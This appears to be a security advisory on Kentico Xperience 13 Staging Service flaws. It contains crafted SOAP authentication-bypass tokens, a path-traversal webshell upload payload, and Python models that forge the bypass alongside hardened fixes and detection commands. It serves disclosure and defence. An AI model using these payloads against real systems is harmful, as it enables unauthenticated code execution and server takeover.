A chain of vulnerabilities in Kentico Xperience CMS 13 allows unauthenticated attackers to execute arbitrary code on unpatched systems.
The flaws – including two authentication bypasses and a post-auth path traversal – affect installations using the Staging Service with username/password authentication.
Vulnerability Breakdown
WT-2025-0006: Staging Service Authentication Bypass
The initial attack vector exploits improper WS-Security UsernameToken handling in the deprecated Microsoft Web Services Enhancements 3.0 (WSE3) library, which the Staging Service still relies on for username/password authentication.
The vulnerable flow:
- SOAP header manipulation: the attacker sends a crafted UsernameToken with a PasswordDigest-type password and empty credentials:

```xml
<wsse:UsernameToken>
  <wsse:Username>invalid_user</wsse:Username>
  <wsse:Password Type="PasswordDigest"></wsse:Password>
  <wsse:Nonce>MTIzNDU2Nzg=</wsse:Nonce>
  <wsu:Created>2025-01-01T00:00:00Z</wsu:Created>
</wsse:UsernameToken>
```

- Flawed hash verification: Kentico's AuthenticateToken override returns an empty string for a username that does not exist instead of failing the request. WSE3 then checks the digest as Base64(SHA1(nonce + created + password)) using that empty password, so an attacker who chooses the nonce and timestamp can compute a matching digest for a non-existent user without knowing any credential.
Impact: Full admin access to the Staging API without authentication.
WT-2025-0007: Post-Auth Remote Code Execution
After bypassing authentication, attackers exploit a path traversal vulnerability during media file uploads:
```xml
<Media_File>
  <FilePath>../../../../../../../../inetpub/wwwroot/</FilePath>
  <FileExtension>.aspx</FileExtension>
</Media_File>
<BinaryData>
  <!-- Base64 ASPX payload; this sample decodes to <%@ language="C" %> -->
  <FileBinaryData>PCVAIGxhbmd1YWdlPSJDIiAlPg==</FileBinaryData>
</BinaryData>
```
Key flaws:
- Unrestricted directory traversal in the CheckAndEnsureFilePath method
- Arbitrary binary data accepted via TaskBinaryData

Result: webshell deployment to a web-accessible directory.
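The two key flaws, modelled in Python as an added example (this is illustrative code, not Kentico's implementation or watchTowr's exploit): vulnerable_target() reproduces the behaviour the advisory attributes to CheckAndEnsureFilePath, joining the task's FilePath onto the media root unchecked, and hardened_target() shows the containment check and extension allow-list that close it, with a content check for TaskBinaryData alongside. The media-root layout, the assumption that FilePath carries the file name, the allow-list and every function name are assumptions; the traversal value is constructed, and the FileBinaryData sample is the one shown above. ntpath is used so that Windows path semantics (both separators, case-insensitivity, '..' collapsing at the drive root) are reproduced on any host.

```python
import base64
import ntpath  # Windows path semantics on any host: '/' and '\' both separate, '..' collapses

MEDIA_ROOT = r"C:\inetpub\wwwroot\DancingGoat\media"              # assumed media-library root
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}    # assumed upload allow-list

# Constructed task fields. FilePath is assumed to carry the file name; the extension is separate.
TRAVERSAL_PATH = "../../../../../../../../inetpub/wwwroot/shell"
SAMPLE_BINARY_DATA = "PCVAIGxhbmd1YWdlPSJDIiAlPg=="  # the FileBinaryData sample from the advisory


def vulnerable_target(file_path, file_extension):
    """Models CheckAndEnsureFilePath as described: the task's FilePath is joined onto the
    media root unchanged, so '..' segments walk out of the media library."""
    return ntpath.normpath(ntpath.join(MEDIA_ROOT, file_path + file_extension))


def hardened_target(file_path, file_extension):
    """Normalise first, then require the result to stay under the media root and to carry
    an allow-listed extension. Raises ValueError on either failure."""
    ext = file_extension.lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed: " + file_extension)
    # Drop any drive or leading separator so an absolute FilePath cannot replace the root.
    relative = ntpath.splitdrive(file_path)[1].lstrip("\\/")
    full = ntpath.normpath(ntpath.join(MEDIA_ROOT, relative + ext))
    root = ntpath.normpath(MEDIA_ROOT) + "\\"
    if not full.lower().startswith(root.lower()):   # NTFS paths are case-insensitive
        raise ValueError("path escapes media root: " + full)
    return full


def hardened_rejects(file_path, file_extension):
    """Error message the hardened check produces, or None if the upload is accepted."""
    try:
        hardened_target(file_path, file_extension)
        return None
    except ValueError as err:
        return str(err)


def looks_like_server_script(binary_data_b64):
    """Content check for TaskBinaryData: ASP.NET markup starts with '<%' whatever the
    extension claims, so this also catches a payload renamed to an allowed type."""
    return base64.b64decode(binary_data_b64).lstrip().startswith(b"<%")


if __name__ == "__main__":
    print("vulnerable:", vulnerable_target(TRAVERSAL_PATH, ".aspx"))    # C:\inetpub\wwwroot\shell.aspx
    print("hardened  :", hardened_rejects(TRAVERSAL_PATH, ".aspx"))     # extension not allowed: .aspx
    print("hardened  :", hardened_rejects(TRAVERSAL_PATH, ".png"))      # path escapes media root: ...
    print("hardened  :", hardened_rejects(r"..\..\..\shell", ".png"))   # backslashes normalise the same way
    print("hardened  :", hardened_target("gallery/photo", ".png"))      # ...\media\gallery\photo.png
    print("payload   :", looks_like_server_script(SAMPLE_BINARY_DATA))  # True
```

The containment test runs on the normalised absolute path rather than searching the raw string for "..": Windows accepts mixed separators and collapses traversal after normalisation, so a string match on the client-supplied value misses the backslash variant shown in the last rejection. The extension allow-list is checked on the normalised extension as well, since a deny-list of ".aspx" alone leaves every other executable extension ASP.NET maps.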
WT-2025-0011: Secondary Authentication Bypass
A second bypass was discovered in WSE3's PasswordOption.SendNone handling, where a UsernameToken that carries no Password element at all is accepted:

```xml
<wsse:UsernameToken>
  <wsse:Username>admin</wsse:Username>
  <!-- No password element -->
</wsse:UsernameToken>
```
Behavior:
- Versions 13.0.173-177 require a valid username (default: admin)
- Versions before 13.0.173 accept any username
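Both bypasses, WT-2025-0006 and WT-2025-0011, in one added Python model of the WSE3 UsernameToken check and of Kentico's AuthenticateToken override as the advisory describes them (illustrative code, not WSE3's or Kentico's). The digest formula is the WS-Security UsernameToken profile one, Base64(SHA1(nonce || created || password)); the user store, its password, the function names and the reuse of the nonce and timestamp from the token above are assumptions.

```python
import base64
import hashlib
import xml.etree.ElementTree as ET

WSSE = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
NS = {"wsse": WSSE, "wsu": WSU}

USERS = {"admin": "correct-horse-battery-staple"}  # constructed user store: one real account
NONCE = "MTIzNDU2Nzg="                              # nonce and timestamp from the token above;
CREATED = "2025-01-01T00:00:00Z"                    # the attacker chooses both


def password_digest(nonce_b64, created, password):
    """UsernameToken profile digest as WSE3 computes it: Base64(SHA1(nonce || created || password))."""
    raw = base64.b64decode(nonce_b64) + created.encode() + password.encode()
    return base64.b64encode(hashlib.sha1(raw).digest()).decode()


def build_token(username, password=None):
    """Attacker-side builder. password=None omits the Password element entirely
    (PasswordOption.SendNone, the WT-2025-0011 shape); any string sends a PasswordDigest."""
    pw = ""
    if password is not None:
        pw = ('<wsse:Password Type="PasswordDigest">'
              + password_digest(NONCE, CREATED, password) + "</wsse:Password>")
    return (f'<wsse:UsernameToken xmlns:wsse="{WSSE}" xmlns:wsu="{WSU}">'
            f"<wsse:Username>{username}</wsse:Username>{pw}"
            f"<wsse:Nonce>{NONCE}</wsse:Nonce><wsu:Created>{CREATED}</wsu:Created>"
            "</wsse:UsernameToken>")


def flawed_authenticate_token(username):
    """Models the AuthenticateToken override described above: unknown user -> "" instead of an error."""
    return USERS.get(username, "")


def fixed_authenticate_token(username):
    """What the override should do: an unknown user is a hard failure."""
    if username not in USERS:
        raise PermissionError("unknown user")
    return USERS[username]


def _parse(token_xml):
    root = ET.fromstring(token_xml)
    return (root.findtext("wsse:Username", namespaces=NS),
            root.find("wsse:Password", namespaces=NS),
            root.findtext("wsse:Nonce", namespaces=NS),
            root.findtext("wsu:Created", namespaces=NS))


def wse3_verify(token_xml, authenticate_token):
    """Model of the WSE3 check: ask the host for the user's password; if a digest was sent,
    compare it; if no Password element was sent, accept as soon as the username resolves."""
    username, pw_el, nonce, created = _parse(token_xml)
    expected = authenticate_token(username)
    if pw_el is None:
        return username                      # SendNone: no secret is checked at all
    if pw_el.get("Type") != "PasswordDigest":
        raise PermissionError("unsupported password type")
    if pw_el.text != password_digest(nonce, created, expected):
        raise PermissionError("digest mismatch")
    return username


def hardened_verify(token_xml, authenticate_token):
    """Same check with both gaps closed: a digest is mandatory, and an empty stored
    password never verifies no matter what the host's lookup returns."""
    username, pw_el, nonce, created = _parse(token_xml)
    expected = authenticate_token(username)
    if pw_el is None or pw_el.get("Type") != "PasswordDigest":
        raise PermissionError("password digest required")
    if not expected or pw_el.text != password_digest(nonce, created, expected):
        raise PermissionError("digest mismatch")
    return username


def outcome(verify, token_xml, authenticate_token):
    """Identity the service would act under, or None if the token is rejected."""
    try:
        return verify(token_xml, authenticate_token)
    except PermissionError:
        return None


if __name__ == "__main__":
    forged = build_token("invalid_user", password="")  # WT-2025-0006: digest over nonce + created only
    no_password = build_token("admin")                 # WT-2025-0011: Password element omitted
    print("0006, flawed lookup:", outcome(wse3_verify, forged, flawed_authenticate_token))       # invalid_user
    print("0006, fixed lookup :", outcome(wse3_verify, forged, fixed_authenticate_token))        # None
    print("0011, fixed lookup :", outcome(wse3_verify, no_password, fixed_authenticate_token))   # admin
    print("0011, flawed lookup:", outcome(wse3_verify, build_token("anyone"), flawed_authenticate_token))  # anyone
    print("hardened           :", outcome(hardened_verify, forged, flawed_authenticate_token),
          outcome(hardened_verify, no_password, fixed_authenticate_token))                       # None None
```

The two runs against wse3_verify reproduce the version behaviour in the list above: with the flawed lookup any username works for both shapes, and with the fixed lookup (the 13.0.173 state) the digest forgery fails but a token with no Password element still authenticates an existing account. Fixing the host's lookup is therefore not enough on its own; the SendNone path has to be refused by the verifier, which is what hardened_verify does.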
Technical Impact
Combining these flaws enables a full attack chain:
- Bypass auth via WT-2025-0006/0011
- Create malicious media library entry
- Upload web shell via path traversal
- Execute OS commands through HTTP requests to the web shell
Affected Versions & Mitigation
Version Range | Vulnerabilities | Patch Version
---|---|---
13.0.0 – 13.0.172 | WT-2025-0006, WT-2025-0007, WT-2025-0011 | 13.0.178
13.0.173 – 13.0.177 | WT-2025-0007, WT-2025-0011 | 13.0.178
Immediate Actions:
- Upgrade to ≥13.0.178
- Disable Staging Service if unused
- Switch to X.509 authentication for required deployments
Vendor Response & Detection
Kentico released patches within 6 days of disclosure. Security teams can use watchTowr’s detection scripts:
```bash
# WT-2025-0006 check
python3 watchTowr-vs-kentico-xperience13-AuthBypass-wt-2025-0006.py -H http://target
# WT-2025-0011 check
python3 watchTowr-vs-kentico-xperience13-AuthBypass-wt-2025-0011.py -H http://target -u admin
```
Security Takeaway: These vulnerabilities highlight the risks of using deprecated libraries like WSE3.
Organizations must audit third-party dependencies and implement layered API security controls, even for “internal” services.